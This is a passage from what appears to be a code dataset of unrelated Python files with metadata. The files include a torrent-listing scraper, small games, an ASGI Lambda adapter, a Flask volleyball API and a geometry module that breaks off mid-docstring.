ax=self.ax)\n # self.canvas.draw()\n\n # self.ax.clear()\n # self.RC.plot_cycle_XY(X='s', Y='h', ax=self.ax)\n # self.canvas.draw()\n\n\n# if this module is being imported, this won't run. If it is the main module, it will run.\nif __name__ == '__main__':\n app = qtw.QApplication(sys.argv)\n mw = MainWindow()\n mw.setWindowTitle('Rankine Cycle Calculator')\n sys.exit(app.exec())\n","sub_path":"Exam3/Problem2/Rankine_app.py","file_name":"Rankine_app.py","file_ext":"py","file_size_in_byte":8145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"493868366","text":"# coding=utf-8\n# 获取首页指定资源,并按时间,类型,资源名,资源详情页的格式显示\n\nfrom urllib import request\nfrom bs4 import BeautifulSoup\nimport re, time\n\npage_count = 80 # 每页数目\npage_num = 1 # 页数\ntoday = time.strftime(\"%Y/%m/%d\", time.localtime()) # 当天日期\nbase_url = 'https://share.dmhy.org'\nbangumi_name = '枫叶.*?太阳|驚爆危機|gun' # 搜索的资源名,以|分割\n\nurl = base_url + '/topics/list/page/'+str(page_num)\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'}\npage = request.Request(url, headers=headers)\npage_info = request.urlopen(page).read() # 打开Url,获取HttpResponse返回对象并读取其ResposneBody\n\n# 将获取到的内容转换成BeautifulSoup格式,并将html.parser作为解析器\nsoup = BeautifulSoup(page_info, 'html.parser', from_encoding='utf-8')\n# 以格式化的形式打印html\n# print(soup.prettify())\n\n\ncount = 0 # 计数器\n\ntbody = soup.find('table','tablesorter').tbody\ntr = tbody.find_all('tr')\nfor per_tr in tr:\n name = per_tr.find_all('td')\n today_flag = name[0].span.find(text=re.compile(today))\n name_flag = name[2].find(text=re.compile(bangumi_name,re.I))\n if today_flag and name_flag and name[1].find('a').get('class')[0] == 'sort-2':\n type = name[1].find('a').get_text().strip()\n cnt = name[2].find_all('a')\n if len(cnt) == 1:\n cnt_detail = cnt[0].get_text().strip() + ' ' + base_url + cnt[0].get('href')\n else:\n cnt_detail = cnt[0].get_text().strip() + ' ' + cnt[1].get_text().strip() + ' ' + base_url + cnt[1].get('href')\n\n # 输出格式:日期 大小 类别 资源名 链接\n print(name[0].span.string, name[4].get_text(), type, cnt_detail)\n count += 1\n\nprint('共{:d}项'.format(count))\n\n\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"644727205","text":"import random\n\nprint('Добро пожаловать в числовую угадайку')\n\n\ndef max_range():\n while True:\n n = input('Назовите диапозон от 1 до какого числа хотите угадать: ')\n if not n.isdigit() or int(n) < 1:\n print('Введите число от 1')\n continue\n return int(n)\n\n\nq = max_range()\nnum = random.randrange(1, q)\n\n\ndef get_num():\n while True:\n s = input(f'Угадайте число от 1 до {q}: ')\n if not s.isdigit() or int(s) < 1 or int(s) > q:\n print(f'Может введете все таки число от 1 до {q}?')\n continue\n return int(s)\n\n\ndef game():\n x, counter = 0, 1\n while x != num:\n x = get_num()\n if x < num:\n print('Ваше число меньше загаданного, попробуйте еще разок')\n counter += 1\n continue\n elif x > num:\n print('Ваше число больше загаданного, попробуйте еще разок')\n counter += 1\n continue\n print('Вы угадали, поздравляем!')\n print('Количество попыток', counter)\n\n\nwhile True:\n game()\n print('Отлична игра еще разок?')\n answer = input(\"'Да' или 'Y' если хотите продолжить: \")\n if answer.lower() in ('да', 'y'):\n q = max_range()\n num = random.randrange(1, q)\n continue\n else:\n break\n\nprint('Спасибо, что играли в числовую угадайку. Еще увидимся...')\n","sub_path":"1.answer_num.py","file_name":"1.answer_num.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"313285751","text":"from crc8 import crc8\nfrom injector import inject\nfrom socketio.client import Client\nfrom src.domain.robot.RobotInfos import RobotInfos\nfrom src.domain.robot.SerialPort import SerialPort\nfrom src.domain.robot.data_classes.Resistor import ResistorInfo\nfrom src.domain.robot.data_classes.RobotBattery import RobotBattery\nfrom src.domain.robot.data_classes.RobotPowers import RobotPowers\n\n\nclass STMReader(object):\n\n @inject\n def __init__(self, socket: Client, robot_infos: RobotInfos, serial_port: SerialPort):\n self.__socket = socket\n self.__robot_infos = robot_infos\n self.__serial_port = serial_port\n self.read_thread = self.__socket.start_background_task(self.read_handler)\n\n def validate_checksum(self, message: str, checksum: str) -> bool:\n return self.generate_checksum(message) == checksum\n\n @staticmethod\n def generate_checksum(message: str) -> str:\n crc8_hash = crc8()\n crc8_hash.update(message.encode(\"utf8\"))\n return crc8_hash.hexdigest()\n\n def read_valid_line(self) -> str:\n received_valid_line = False\n while not received_valid_line:\n received_line = self.__serial_port.read_line()\n message, checksum = received_line.split(\";\")\n received_valid_line = self.validate_checksum(message, checksum)\n if not received_valid_line:\n print(\"Invalid checksum\")\n else:\n return message\n\n def read_handler(self):\n while True:\n received_line = self.read_valid_line()\n if \"POWER\" in received_line:\n received_line = received_line.replace(\"POWER:\", \"\")\n powers = received_line.split(\",\")\n self.__robot_infos.powers = RobotPowers(*powers)\n elif \"GRIPPER_PROXIMITY\" in received_line:\n received_line = received_line.replace(\"GRIPPER_PROXIMITY:\", \"\")\n gripper_making_contact = bool(received_line)\n current_gripper_info = self.__robot_infos.gripper_info\n current_gripper_info.making_contact = gripper_making_contact\n self.__robot_infos.gripper_info = current_gripper_info\n elif \"RESISTOR\" in received_line:\n received_line = received_line.replace(\"RESISTOR:\", \"\")\n resistor = int(received_line)\n self.__robot_infos.resistor_info = ResistorInfo(resistor)\n elif \"BATTERY\" in received_line:\n received_line = received_line.replace(\"BATTERY:\", \"\")\n battery_charge = int(received_line)\n self.__robot_infos.battery = RobotBattery(battery_charge)\n else:\n print(\"received from STM: {}\".format(received_line))\n","sub_path":"robot/src/domain/stm/STMReader.py","file_name":"STMReader.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"561866291","text":"import base64\nimport asyncio\nimport urllib.parse\nimport json\nimport typing\nfrom dataclasses import dataclass\n\nfrom mangum.lifespan import Lifespan\nfrom mangum.utils import get_logger, make_response\nfrom mangum.types import ASGIApp\nfrom mangum.protocols.http import ASGIHTTPCycle\nfrom mangum.protocols.websockets import ASGIWebSocketCycle\nfrom mangum.exceptions import ASGIWebSocketCycleException\nfrom mangum.connections import ConnectionTable, __ERR__\n\n\nDEFAULT_TEXT_MIME_TYPES = [\n \"application/json\",\n \"application/javascript\",\n \"application/xml\",\n \"application/vnd.api+json\",\n]\n\n\ndef get_server_and_client(\n event: dict, is_http_api: bool = False\n) -> typing.Tuple: # pragma: no cover\n \"\"\"\n Parse the server and client for the scope definition, if possible.\n \"\"\"\n\n if is_http_api:\n client_addr = event[\"requestContext\"][\"http\"][\"sourceIp\"]\n else:\n client_addr = event[\"requestContext\"].get(\"identity\", {}).get(\"sourceIp\", None)\n\n client = (client_addr, 0)\n\n headers = event.get(\"headers\") or {}\n server_addr = headers.get(\"host\") if is_http_api else headers.get(\"Host\")\n\n if server_addr is not None:\n if \":\" not in server_addr:\n server_port = 80\n else:\n server_addr, server_port = server_addr.split(\":\")\n server_port = int(server_port)\n\n server = (server_addr, server_port) # type: typing.Any\n else:\n server = None\n\n return server, client\n\n\n@dataclass\nclass Mangum:\n\n app: ASGIApp\n enable_lifespan: bool = True\n api_gateway_base_path: typing.Optional[str] = None\n text_mime_types: typing.Optional[typing.List[str]] = None\n log_level: str = \"info\"\n\n def __post_init__(self) -> None:\n self.logger = get_logger(log_level=self.log_level)\n if self.enable_lifespan:\n loop = asyncio.get_event_loop()\n self.lifespan = Lifespan(self.app, logger=self.logger)\n loop.create_task(self.lifespan.run())\n loop.run_until_complete(self.lifespan.wait_startup())\n\n def __call__(self, event: dict, context: dict) -> dict:\n try:\n response = self.handler(event, context)\n except BaseException as exc:\n raise exc\n return response\n\n def strip_base_path(self, path: str) -> str:\n if self.api_gateway_base_path:\n script_name = \"/\" + self.api_gateway_base_path\n if path.startswith(script_name):\n path = path[len(script_name) :]\n return urllib.parse.unquote(path or \"/\")\n\n def handler(self, event: dict, context: dict) -> dict:\n\n if \"eventType\" not in event[\"requestContext\"]:\n response = self.handle_http(event, context)\n else:\n\n response = self.handle_ws(event, context)\n\n if self.enable_lifespan:\n loop = asyncio.get_event_loop()\n loop.run_until_complete(self.lifespan.wait_shutdown())\n return response\n\n def handle_http(self, event: dict, context: dict) -> dict:\n is_http_api = \"http\" in event[\"requestContext\"]\n server, client = get_server_and_client(event, is_http_api)\n headers = event.get(\"headers\") or {}\n headers_key_value_pairs = [\n [k.lower().encode(), v.encode()] for k, v in headers.items()\n ]\n\n if is_http_api:\n query_string = event.get(\"rawQueryString\")\n else:\n multi_value_query_string_params = event[\"multiValueQueryStringParameters\"]\n query_string = (\n urllib.parse.urlencode(\n multi_value_query_string_params, doseq=True\n ).encode()\n if multi_value_query_string_params\n else b\"\"\n )\n\n event_path = (\n event[\"requestContext\"][\"http\"][\"path\"] if is_http_api else event[\"path\"]\n )\n http_method = (\n event[\"requestContext\"][\"http\"][\"method\"]\n if is_http_api\n else event[\"httpMethod\"]\n )\n\n scope = {\n \"type\": \"http\",\n \"http_version\": \"1.1\",\n \"method\": http_method,\n \"headers\": headers_key_value_pairs,\n \"path\": self.strip_base_path(event_path),\n \"raw_path\": None,\n \"root_path\": \"\",\n \"scheme\": headers.get(\"X-Forwarded-Proto\", \"https\"),\n \"query_string\": query_string,\n \"server\": server,\n \"client\": client,\n \"asgi\": {\"version\": \"3.0\"},\n \"aws.event\": event,\n \"aws.context\": context,\n }\n\n is_binary = event.get(\"isBase64Encoded\", False)\n body = event.get(\"body\") or b\"\"\n if is_binary:\n body = base64.b64decode(body)\n elif not isinstance(body, bytes):\n body = body.encode()\n\n if self.text_mime_types:\n text_mime_types = self.text_mime_types + DEFAULT_TEXT_MIME_TYPES\n else:\n text_mime_types = DEFAULT_TEXT_MIME_TYPES\n\n asgi_cycle = ASGIHTTPCycle(\n scope, text_mime_types=text_mime_types, logger=self.logger\n )\n asgi_cycle.put_message(\n {\"type\": \"http.request\", \"body\": body, \"more_body\": False}\n )\n response = asgi_cycle(self.app)\n return response\n\n def handle_ws(self, event: dict, context: dict) -> dict:\n if __ERR__: # pragma: no cover\n raise ImportError(__ERR__)\n\n request_context = event[\"requestContext\"]\n connection_id = request_context.get(\"connectionId\")\n domain_name = request_context.get(\"domainName\")\n stage = request_context.get(\"stage\")\n event_type = request_context[\"eventType\"]\n endpoint_url = f\"https://{domain_name}/{stage}\"\n\n if event_type == \"CONNECT\":\n # The initial connect event. Parse and store the scope for the connection\n # in DynamoDB to be retrieved in subsequent message events for this request.\n server, client = get_server_and_client(event)\n\n # The scope headers must be JSON serializable to store in DynamoDB, but\n # they will be parsed on the MESSAGE event.\n headers = event.get(\"headers\") or {}\n\n root_path = event[\"requestContext\"][\"stage\"]\n scope = {\n \"type\": \"websocket\",\n \"path\": \"/\",\n \"headers\": headers,\n \"raw_path\": None,\n \"root_path\": root_path,\n \"scheme\": headers.get(\"X-Forwarded-Proto\", \"wss\"),\n \"query_string\": \"\",\n \"server\": server,\n \"client\": client,\n \"aws\": {\"event\": event, \"context\": context},\n }\n connection_table = ConnectionTable()\n status_code = connection_table.update_item(\n connection_id, scope=json.dumps(scope)\n )\n\n if status_code != 200: # pragma: no cover\n return make_response(\"Error\", status_code=500)\n return make_response(\"OK\", status_code=200)\n\n elif event_type == \"MESSAGE\":\n\n connection_table = ConnectionTable()\n item = connection_table.get_item(connection_id)\n if not item: # pragma: no cover\n return make_response(\"Error\", status_code=500)\n\n # Retrieve and deserialize the scope entry created in the connect event for\n # the current connection.\n scope = json.loads(item[\"scope\"])\n\n # Ensure the scope definition complies with the ASGI spec.\n query_string = scope[\"query_string\"]\n headers = scope[\"headers\"]\n headers = [\n [k.encode(), v.encode()] for k, v in headers.items() # type: ignore\n ]\n query_string = query_string.encode() # type: ignore\n scope.update({\"headers\": headers, \"query_string\": query_string})\n\n asgi_cycle = ASGIWebSocketCycle(\n scope,\n endpoint_url=endpoint_url,\n connection_id=connection_id,\n connection_table=connection_table,\n )\n asgi_cycle.app_queue.put_nowait({\"type\": \"websocket.connect\"})\n asgi_cycle.app_queue.put_nowait(\n {\n \"type\": \"websocket.receive\",\n \"path\": \"/\",\n \"bytes\": None,\n \"text\": event[\"body\"],\n }\n )\n\n try:\n asgi_cycle(self.app)\n except ASGIWebSocketCycleException: # pragma: no cover\n return make_response(\"Error\", status_code=500)\n return make_response(\"OK\", status_code=200)\n\n elif event_type == \"DISCONNECT\":\n connection_table = ConnectionTable()\n status_code = connection_table.delete_item(connection_id)\n if status_code != 200: # pragma: no cover\n return make_response(\"WebSocket disconnect error.\", status_code=500)\n return make_response(\"OK\", status_code=200)\n return make_response(\"Error\", status_code=500) # pragma: no cover\n","sub_path":"mangum/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"599684224","text":"\"\"\"\nAuthor: Alan Danque\nDate: 20210323\nPurpose:Creates map of the top employers\n\nReferences:\nhttps://moneyinc.com/the-20-biggest-employers-in-nyc/\nhttps://fortune.com/best-workplaces-new-york/2020/search/\n\n\"\"\"\nimport csv\nimport folium\nimport pandas as pd\nimport json\nfrom folium import plugins\n#import imgkit\nimport pygeohash\n\nNYCEmployers = \"C:/Alan/DSC680/Project1Data/NYCEmployers.csv\"\nRentHop = \"C:/Alan/DSC680/Project1Data/renthopNYC.csv\"\nRentHop_OUT = \"C:/Alan/DSC680/Project1Data/renthopNYC_OUT.csv\"\nYelp = \"C:/Alan/DSC680/Project1Data/yelp_business_data.csv\"\n\n\n# TOP EMPLOYERS\nnycemployers_df = pd.read_csv(NYCEmployers,encoding='utf-8', names=[\"Rank\",\"Name\",\"Industry\",\"HQ Location\",\"Sites\",\"Employees\",\"World Wide Revenue\",\"Latitude\",\"Longitude\"],sep=',',header=0,quoting=csv.QUOTE_ALL, engine='python')\nnycemployers_df['geohash'] = nycemployers_df.apply(lambda x: pygeohash.encode(x.Latitude, x.Longitude), axis=1)\n\n# RENTHOP\nrenthop_df = pd.read_csv(RentHop)\nrenthop_df['geohash'] = renthop_df.apply(lambda x: pygeohash.encode(x.latitude, x.longitude), axis=1)\n\nfor index, row in nycemployers_df.iterrows():\n fieldname = row['Name']+\" Distance\"\n emp_geohash = row['geohash']\n renthop_df[fieldname] = renthop_df.apply(lambda x: pygeohash.geohash_approximate_distance(x.geohash, emp_geohash) / 1000, axis=1)\n\n # distm_west = pygeohash.geohash_approximate_distance(srcgeoval, westval) / 1000\n\nprint(type(renthop_df))\nprint(renthop_df.shape) # 49,352 obs and 15 vars\nprint(renthop_df.columns)\n\nrenthop_df.to_csv(RentHop_OUT)\n","sub_path":"Scripts/CalculateDistancesToTopNYCEmployers.py","file_name":"CalculateDistancesToTopNYCEmployers.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"172771198","text":"import pygame\r\nfrom pygame.locals import *\r\nfrom Map import *\r\nimport random\r\nimport time\r\n\r\nBLACK = (0,0,0)\r\nRED = (255,0,0)\r\nBLUE = (0,0,255)\r\nYELLOW = (255,255,0)\r\nGRAY = (128,128,128)\r\n\r\n# Load the pictures representing enemies of different colors.\r\nred_monster = pygame.image.load(\"red_monster.jpg\")\r\nblue_monster = pygame.image.load(\"blue_monster.jpg\")\r\nblack_monster = pygame.image.load(\"black_monster.jpg\")\r\nyellow_monster = pygame.image.load(\"yellow_monster.jpg\")\r\ngray_monster = pygame.image.load(\"gray_monster.jpg\")\r\n\r\nclass Enemy(pygame.sprite.Sprite): # Define a class Enemy.\r\n def __init__(self, health, speed, price, color, resistant, points):\r\n super().__init__()\r\n self.color = color\r\n # Define the picture of an enemy.\r\n if (self.color == \"B\"):\r\n self.image = black_monster\r\n elif (self.color == \"r\"):\r\n self.image = red_monster\r\n elif (self.color == \"b\"):\r\n self.image = blue_monster\r\n elif (self.color == \"y\"):\r\n self.image = yellow_monster\r\n elif (self.color == \"g\"):\r\n self.image = gray_monster\r\n try:\r\n self.rect = self.image.get_rect()\r\n except AttributeError:\r\n print(\"Invalid enemy color!\")\r\n import Main\r\n Main.main()\r\n self.health = health # The health of the enemy.\r\n self.value = 0 # A variable \"value\" that tells how long distance the enemy has travelled in the field.\r\n self.points = points # A dictionary that contains the points in which the direction of the enemies should change and the directions to which the movement will change.\r\n self.direction = \"none\" # Initialize a variable that tells the direction of movement of the enemy.\r\n self.speed = speed # The speed of the enemy.\r\n self.n = 0 # A counter that ensures that an enemy chooses its direction only in an intersection and after it, the direction is kept constant.\r\n self.decideDirection = 0 # A variable that gets either value 0 or 1. This decides the direction of the enemy after an intersection.\r\n self.poisonTime = 0 # A counter that controls, how quickly poison affects the enemy.\r\n self.poison = 0 # A variable that tells whether an enemy is poisoned or not.\r\n self.price = price # The amount of money the player gets when he destroys this enemy.\r\n self.resistant = resistant # To which type of tower the enemy is immune.\r\n self.dist = 0 # The distnace of an enemy from a smart bomb.\r\n \r\n \r\n def get_location(self): # Returns the coordinates of an enemy.\r\n x = self.rect.centerx\r\n y = self.rect.centery\r\n coordinates = (x, y)\r\n return coordinates\r\n \r\n def update(self): # This controls, how the properties of an ememy (for example location) are varied within on iteration of a game loop.\r\n if self.poison == 1 and float(time.monotonic()) - float(self.poisonTime) > 3.0: # If the enemy is poisoned and over 3 seconds have passed since the poison last affected the enemy, we reduce the health of the enemy by 5.\r\n self.poisonTime = time.monotonic()\r\n self.health -= 5\r\n \r\n if self.get_location() in self.points: # If the coordinates of an enemy are the same as the coordinates of some intersection, we use these coordinates as a key to dictionary \"self.points\" and read the values corresponding to this key.\r\n self.n = 0\r\n self.direction = self.points[self.get_location()]\r\n \r\n if self.direction == \"right\": # If the dictionary returns a value \"right\", we move the enemy to the right with speed \"self.speed\" pixels / screen update.\r\n self.rect.centerx += self.speed\r\n \r\n elif self.direction == \"left\":\r\n self.rect.centerx -= self.speed\r\n \r\n elif self.direction == \"up\":\r\n self.rect.centery -= self.speed\r\n \r\n elif self.direction == \"down\":\r\n self.rect.centery += self.speed\r\n \r\n elif self.direction == \"A\": # If the dictionary returns a value \"A\", we choose randomly an integer from range [0,1] and depending on the result, we move the enemy to either up or right.\r\n if self.n == 0:\r\n self.decideDirection = random.randint(0,1)\r\n self.n = 1\r\n if self.decideDirection == 0:\r\n self.rect.centery -= self.speed\r\n self.direction = \"up\"\r\n elif self.decideDirection == 1:\r\n self.rect.centerx += self.speed\r\n self.direction = \"right\"\r\n \r\n elif self.direction == \"B\":\r\n if self.n == 0:\r\n self.decideDirection = random.randint(0,1)\r\n self.n = 1\r\n if self.decideDirection == 0:\r\n self.rect.centery -= self.speed\r\n self.direction = \"up\"\r\n elif self.decideDirection == 1:\r\n self.rect.centerx -= self.speed\r\n self.direction = \"left\"\r\n \r\n elif self.direction == \"C\":\r\n if self.n == 0:\r\n self.decideDirection = random.randint(0,1)\r\n self.n = 1\r\n if self.decideDirection == 0:\r\n self.rect.centery -= self.speed\r\n self.direction = \"up\"\r\n elif self.decideDirection == 1:\r\n self.rect.centery += self.speed\r\n self.direction = \"down\"\r\n \r\n elif self.direction == \"D\":\r\n if self.n == 0:\r\n self.decideDirection = random.randint(0,1)\r\n self.n = 1\r\n if self.decideDirection == 0:\r\n self.rect.centerx += self.speed\r\n self.direction = \"right\"\r\n elif self.decideDirection == 1:\r\n self.rect.centerx -= self.speed\r\n self.direction = \"left\"\r\n \r\n elif self.direction == \"E\":\r\n if self.n == 0:\r\n self.decideDirection = random.randint(0,1)\r\n self.n = 1\r\n if self.decideDirection == 0:\r\n self.rect.centerx += self.speed\r\n self.direction = \"right\"\r\n elif self.decideDirection == 1:\r\n self.rect.centery += self.speed\r\n self.direction = \"down\"\r\n \r\n elif self.direction == \"F\":\r\n if self.n == 0:\r\n self.decideDirection = random.randint(0,1)\r\n self.n = 1\r\n if self.decideDirection == 0:\r\n self.rect.centerx -= self.speed\r\n self.direction = \"left\"\r\n elif self.decideDirection == 1:\r\n self.rect.centery += self.speed\r\n self.direction = \"down\"\r\n \r\n self.value += self.speed\r\n","sub_path":"Enemysprite.py","file_name":"Enemysprite.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"480316829","text":"import random\nimport time\n\nclass Game():\n def __init__(self):\n under_board = [1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8]\n random.shuffle(under_board)\n\n self.under_board = [\n under_board[:4],\n under_board[4:8],\n under_board[8:12],\n under_board[12:]\n ]\n\n self.board = [list('*' * 4) for i in range(4)]\n\n self.first_card = None\n\n self.start_time = time.time()\n\n\n def show_board(self, *tiles):\n \"\"\"\n Creating the board for the game\n \"\"\"\n\n for row in range(len(self.board)):\n for column in range(len(self.board[0])):\n if (row, column) in tiles:\n print(self.under_board[row][column], end=\"\")\n else:\n print(self.board[row][column], end=\"\")\n print()\n\n def safe_input(self, prompt) -> (int, int):\n \"\"\"\n Let's the user input numbers given that the number is valid.\n \"\"\"\n try:\n user_input = [int(x) for x in input(prompt)]\n # assert that the input is valid\n assert len(user_input) == 2\n for u in user_input:\n assert u in range(4)\n assert (self.move_first_card is None) or (user_input != self.first_card)\n return user_input\n except (ValueError, AssertionError):\n print(u'\\u001b[31mThat is not a valid input! Please try again\\u001b[0m' + '\\n'+ '\\n'+ '\\n'+ '\\n' +'\\n')\n return self.safe_input(prompt)\n\n def time_countdown(self):\n #time\n elapsed_time = time.time() - self.start_time\n global countdown\n countdown = 180 - int(elapsed_time)\n\n if countdown < 0:\n timeout = input('Oh no! Your time is up! Do you want to try again? [Y/N]' + '')\n if timeout[0] == 'Y':\n play_game()\n else:\n exit()\n\n def num_pick(self):\n \"\"\"\n Let the user choose two cards, assert whether they matched, and check if the game is finished.\n \"\"\"\n self.move_first_card = None\n a, b = self.safe_input('Pick two coordinates between 0 and 3 written like this \"21\" to pick a card on the board:' + '')\n self.move_first_card = [a, b]\n self.show_board((a, b))\n\n c, d = self.safe_input('Type two different coordinates between 0 and 3 to pick another card:' + '')\n self.show_board((a, b), (c, d))\n\n if a == c and b == d:\n print(u'\\u001b[31mTyping the same value twice is not a valid input! Please try again.\\u001b[0m' + '\\n'+ '\\n'+ '\\n'+ '\\n' +'\\n')\n\n else:\n if self.under_board[a][b] == self.under_board[c][d]:\n self.time_countdown()\n print( '\\n'+ u'\\u001b[7m RESULT \\u001b[0m' + '\\n' + u'\\u001b[32mYour cards matched!\\u001b[0m' + '\\n' + 'You have' + ' ' + str(countdown) + ' ' + 'seconds left of the game. Hurry up!' + '\\n'+ '\\n'+ '\\n'+ '\\n' +'\\n')\n self.board[a][b] = self.under_board[a][b]\n self.board[c][d] = self.under_board[c][d]\n else:\n self.time_countdown()\n print( '\\n'+ u'\\u001b[7m RESULT \\u001b[0m' + '\\n' + u'\\u001b[31mYour cards did not match!\\u001b[0m' + '\\n' + 'You have' + ' ' + str(countdown) + ' ' + 'seconds left of the game. Hurry up!' + '\\n'+ '\\n'+ '\\n'+ '\\n' +'\\n')\n\n\n return any('*' in row for row in self.board)\n\n def play(self):\n \"\"\"\n Entrypoint to a game of Memory.\n \"\"\"\n\n self.show_board()\n\n while self.num_pick():\n pass\n print('Done!')\n\ndef play_game():\n game = Game()\n game.play()\n\n another_game = input('Do you want to play another game? [Y/N]')\n if another_game[0] == 'Y':\n play_game\n else:\n exit()\n\n\nif __name__ == '__main__':\n play_game()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"494543783","text":"import code\n\nclass Pokemon:\n \"\"\"Pokemon class\"\"\"\n\n def __init__(self, name, nickname=\"\", hp=100, level=1, speech=\"\"):\n \n self.name = name\n if nickname != \"\":\n self.nickname = nickname\n else:\n self.nickname = self.name.upper()\n self.hp = hp\n self.level = level\n if speech != \"\":\n self.speech = speech\n else:\n self.speech = f\"{self.name}!\"\n\n \"\"\"Implement later\n self.type = \"\"\n self.shiny = False\n self.weight = 0\n self.moveset = []\n self.nature = \"\"\n\n \"\"\"\n\n def speak(self):\n print(f\"{self.nickname} says {self.speech}\")\n\n\nlillian = Pokemon(\"mew\", \"Lillian\", 300, 5, \"mew\")\nmikey = Pokemon(\"shuckle\", \"Mikey Graham\", 500, 4, \"shuckleshuckle\")\nallan = Pokemon(\"empoleon\", \"Allan\", speech=\"penguin\")\nditto = Pokemon(\"ditto\", level=100, hp=10000)\n\ncode.interact(local=locals())","sub_path":"day20/pokemon2.py","file_name":"pokemon2.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"627752481","text":"from uuid import uuid4\n\nfrom flask import Blueprint, request, jsonify\n\nfrom auth import AuthService\nfrom shared.result import Result\nfrom volleyball_federation import VolleyballFederationService\nfrom webapi.helper import present_result, atomic\n\napi_bp = Blueprint(\"volleyball\", __name__, url_prefix=\"/api\")\n\n\"\"\"\ni used verbs in url endpoints because it is more compatible with the concept of DDD\n and is cleaner than using the name.\n\"\"\"\n\n\n@api_bp.route(\"/auth/signup\", methods=[\"POST\"])\n@atomic\ndef register_user():\n user_id = str(uuid4())\n request_dto = {\n **request.get_json(),\n \"user_id\": user_id\n }\n\n auth = AuthService(getattr(request, 'uow', None))\n result = auth.signup_user(request_dto)\n\n if result.is_success:\n result = Result.ok({\"user_id\": user_id})\n\n return present_result(result)\n\n\n@api_bp.route(\"/auth/login\", methods=[\"POST\"])\n@atomic\ndef login_user():\n request_dto = {\n **request.get_json()\n }\n\n auth = AuthService(getattr(request, 'uow', None))\n result = auth.login_user(request_dto)\n\n if result.is_success:\n result = Result.ok({\"token\": result.value})\n\n return present_result(result)\n\n\n@api_bp.route(\"/federation/team/create_team\", methods=[\"POST\"])\n@atomic\ndef create_team():\n team_id = str(uuid4())\n request_dto = {\n **request.get_json(),\n \"team_id\": team_id\n }\n federation = VolleyballFederationService(getattr(request, 'uow', None))\n result = federation.new_team(request_dto)\n\n if result.is_success:\n result = Result.ok({\"team_id\": team_id})\n\n return present_result(result)\n\n\n@api_bp.route(\"/federation/stadium/build_stadium\", methods=[\"POST\"])\n@atomic\ndef build_stadium():\n stadium_id = str(uuid4())\n request_dto = {\n **request.get_json(),\n \"stadium_id\": stadium_id\n }\n federation = VolleyballFederationService(getattr(request, 'uow', None))\n result = federation.build_stadium(request_dto)\n\n if result.is_success:\n result = Result.ok({\"stadium_id\": stadium_id})\n\n return present_result(result)\n\n\n@api_bp.route(\"/federation/match/new_match\", methods=[\"POST\"])\n@atomic\ndef new_match():\n match_id = str(uuid4())\n request_dto = {\n **request.get_json(),\n \"match_id\": match_id\n }\n federation = VolleyballFederationService(getattr(request, 'uow', None))\n result = federation.new_match(request_dto)\n\n if result.is_success:\n result = Result.ok({\"match_id\": match_id})\n\n return present_result(result)\n\n\n@api_bp.route(\"/federation/match/define_match_seats\", methods=[\"PUT\"])\n@atomic\ndef define_seats_for_match():\n request_dto = {\n **request.get_json()\n }\n federation = VolleyballFederationService(getattr(request, 'uow', None))\n result = federation.define_seats_for_match(request_dto)\n\n return present_result(result)\n","sub_path":"webapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"156113296","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nObjects for dealing with geometric areas computations\n\nThis module provides many objects to deal with geometric areas computations.\nGeneral information on the use of each object is found in its help.\n\nConstants\n-----------\n- pi\n\nFunctions\n-----------\n- 'rectangle' - Return area of the rectangle with specified dimensions\n- 'square' - Return area of the square with specified dimensions\n- 'triangle' - Return area of the triangle with specified dimensions\n- 'parallelograms' - Return area of the parallelograms with specified dimensions\n- 'rhomboedre' - Return area of the rhomboedre with specified dimensions\n- 'trapeze' - Return area of the trapeze with specified dimensions\n- 'circle' - Return area of the circle with specified dimensions\n- 'circleSector' - Return area of the trapeze with specified dimensions\n\"\"\"\n\n################################################################################\n################################################################################\n#\n# IMPORTS\n#\n################################################################################\n################################################################################\nfrom math import pi\n\n################################################################################\n################################################################################\n#\n# VERSIONNING\n#\n################################################################################\n################################################################################\n__author__ = \"Valentin Métraux\"\n__copyright__ = \"Copyright 2011, Personal Library\"\n__credits__ = [\"Valentin Métraux\"]\n__license__ = \"GPL\"\n__version__ = \"12.07.2011\"\n__maintainer__ = \"Valentin Métraux\"\n__email__ = \"valentin@valentinmetraux.com\"\n__status__ = \"production\"\n\n################################################################################\n################################################################################\n#\n# FUNCTIONS\n#\n################################################################################\n################################################################################\ndef rectangle(width, height):\n \"\"\"\n rectangle(width, height) -> float number for area\n\n Return a float number for the area of the rectangle with specified width\n and height.\n\n Parameters\n ----------\n width: float or integer number\n height: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n width = float(width)\n height = float(height)\n area = width*height\n return area\n\ndef square(side):\n \"\"\"\n square(side) -> float number for area\n\n Return a float number for the area of the square with specified side length\n\n Parameters\n ----------\n side: float or integer number\n\n Returns\n -------\n 